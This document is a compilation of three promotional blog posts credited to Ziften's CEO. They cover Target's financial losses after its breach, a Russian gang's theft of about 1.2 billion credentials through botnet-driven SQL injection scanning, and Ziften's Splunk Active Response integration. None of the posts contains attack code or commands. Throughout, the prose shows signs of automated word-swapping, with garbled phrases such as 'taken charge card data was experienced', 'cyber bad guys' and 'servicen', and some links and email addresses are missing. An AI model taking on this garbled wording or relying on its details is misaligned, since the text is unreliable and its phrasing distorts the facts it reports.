Charles Leaver – A Very Slow Recovery And Financial Losses Showed Target The Importance Of Robust Cyber Security Defenses

By Charles Leaver CEO Ziften


After Target was breached it took a number of months for the company to recuperate and be provided a clean bill of health.

Continuous Recovery Effort And Reports Of Financial Loss

It was a major story when Target struggled with its data breach. Like all significant news stories it faded into the background as far as being covered nationally, however as far as the company is concerned it was still a significant top priority. The store reduced its revenue projections for 2014 once again, which suggests that the business had undervalued the effect of the malicious attack that they were exposed to, according CNN Money.

The decline in earnings was actually considerable and the business wound up declaring 62% less earnings. In addition to this they had to pay $111 million as a direct result of the breach in the 2nd fiscal quarter and all of this amounts to a business that was at one time robust now looking a shadow of its former self because of a cyber attack.

As the fallout continued, the scale of the cyber attack began to emerge. Info for around 110 million people was jeopardized, and taken charge card data was experienced by 40 million of those individuals. As news ventured out about the breach, the company made some major modifications that included the execution of more rigid cyber security procedures and the change out of the system admin. Long standing CEO, Gregg Steinhafel, likewise resigned. But it is not considered enough to reduce the effect of the attack. The stakeholders of Target are absorbing the unfavorable impacts of the attack as much as the business itself according to Brian Sozzi of Belus Capital.

In an e-mail to CNN Money Sozzi stated “Target just dropped an epic complete year profits warning onto the heads of its remaining investors.” “Target has given investors ABSOLUTELY NO reason to be encouraged that an international turn-around is secretly emerging.”

Target Offers A Lesson For All Organizations About Improved Pre-emptive Procedures

No matter how proactive a company is to a cyber attack, there is no guarantee that the recovery time will be quicker. The bottom line is that a data breach is bad news for any company no matter how you call it or aim to fix it. Preventative steps are the very best way forward and you need to take steps to make sure an attack does not happen to your company in the first place. Making use of endpoint threat detection systems can have a significant role in maintaining strong defenses for any organization that opts to implement it.


Hackers From Russia Stole Massive Amounts Of Personal Data And This Could Have Been Prevented With Continuous Endpoint Monitoring – Charles Leaver

Charles Leaver Ziften CEO

It is thought that the greatest recognized cyber attack in the history of data breaches has been discovered by an American cyber security company. It is believed by the company that a group of cyber bad guys from Russia that they have been examining for many months is responsible for taking passwords in the billions and other delicate individual data. It is declared that the Russian team stole 4.5 billion credentials, although a lot were duplicated, and the end result was 1.2 billion unique data profiles being stolen. The group stole the details from 420,000 websites of various sizes, from big brand sites to smaller mom and pop shops.

The New York Times mentioned that the cyber wrongdoers comprised of about 12 individuals. Starting with small scale spamming methods in 2011 they gained the majority of the data by purchasing stolen databases.

In an interview with PCMag, the creator of the business that found the breach, Alex Holden, stated “the gang begun by simply buying the databases that were readily available over the Internet.” The group used to buy at fire sales and were referred to as “bottom feeders”. As time went by they began the purchase of higher quality databases. It’s sort of like graduating from taking bikes to stealing expensive automobiles.”

A Graduation From Spamming To Using Botnets

The cyber criminal team started to alter their behavior. Botnets were employed by the group to gather the stolen credentials on a much bigger scale. Through making use of the botnets the group had the ability to automate the process of determining sites that were susceptible and this enabled them to work 24/7. Anytime that a contaminated user would check out a website, the bot would check to see if the vulnerability would undergo an SQL injection automatically. Using these injections, which is a commonly utilized hacking tool, the database of the site would be required to reveal its contents through the entering of a basic query. The botnets would flag those sites that were vulnerable and the hackers returned later on to extract the information from the site. Making use of the bot was the ultimate failure of the group as they were discovered by the security company utilizing it.

It is thought by the security business that the billions of pieces of data that were taken were not stolen at the same time, and that most of the records were most likely bought from other cyber crooks. According to the Times, few of the records that were taken have been offered online, rather the hacking team have actually decided to utilize the data for the sending out of spam messages on social media for other groups so that they can earn money. Other cyber security experts are asserting that the magnitude of this breach is part of a pattern of cyber criminals stockpiling substantial amounts of personal profiles gradually and saving them for use in the future, according to the Wall Street Journal.

Security analyst at the research study firm Gartner, Avivah Litan, said “companies that count on user names and passwords need to cultivate a sense of urgency about changing this.” “Until they do, crooks will just keep stockpiling people’s credentials.”

Cyber attacks and breaches on this scale underline the need for companies to safeguard themselves with the most recent cyber security defenses. Systems that utilize endpoint threat detection and response will assist organizations to create a clearer picture of the hazards facing their networks and receive information that is actionable on how best to resist attacks. Today, when huge data breaches are going to occur more and more, using continuous endpoint visibility is important for the security of an organization. If the network of the company is constantly monitored, threats can be identified in real time, and this will minimize the damage that a data breach can cause on the credibility and bottom line of an organization.


Charles Leaver – What Can The Ziften And Splunk Active Response Framework Do For You?

Written By Charles Leaver CEO Ziften



We were the sponsor in Las Vegas for a fantastic Splunk.conf2014 program, we returned energized and chomping at the bit to push on even further forward with our servicen here at Ziften. A talk that was of specific interest was by the Security Solutions Architect for Splunk, Jose Hernandez. “Utilizing Splunk to Automatically Alleviate Threats” was the name of his presentation. If you wish to see his slides and a recording of the presentation then please go to

Making use of Splunk to assist with mitigation, or as I prefer to refer to it as “Active Response” is an excellent idea. Having all your intelligence data streaming into Splunk is extremely effective, and it can be endpoint data, outside risk feeds etc, and after that you will be able to take action on this data really completes the loop. At Ziften we have our powerful continuous monitoring on the endpoint solution, and being wed to Splunk is something that we are truly very proud of. It is a really strong move in the right direction to have real time data analysis paired with the ability to respond and act against events.

Ziften have actually created a mitigation action which utilizes the offered Active Response code. There is a demo video included in this post below. Here we had the ability to produce a mitigation action within our Ziften App for Splunk as proof of concept. After the action is produced, results within Splunk ES (Enterprise Security) can be observed and tracked. This truly is a significant addition and now users will be able to monitor and track mitigations within Splunk ES, which offers you with the significant benefit of being able to complete the loop and develop a history of your actions.

The fact that Splunk is driving such an effort thrills us, this is likely to progress and we are dedicated to continuously support it and make further development with it. It is really exciting at the moment in the Endpoint Detection and Response area and the Active Response Framework built into Splunk being included will definitely stimulate a high degree of interest in my viewpoint.

For any concerns concerning the Ziften App for Splunk, please send out an e-mail to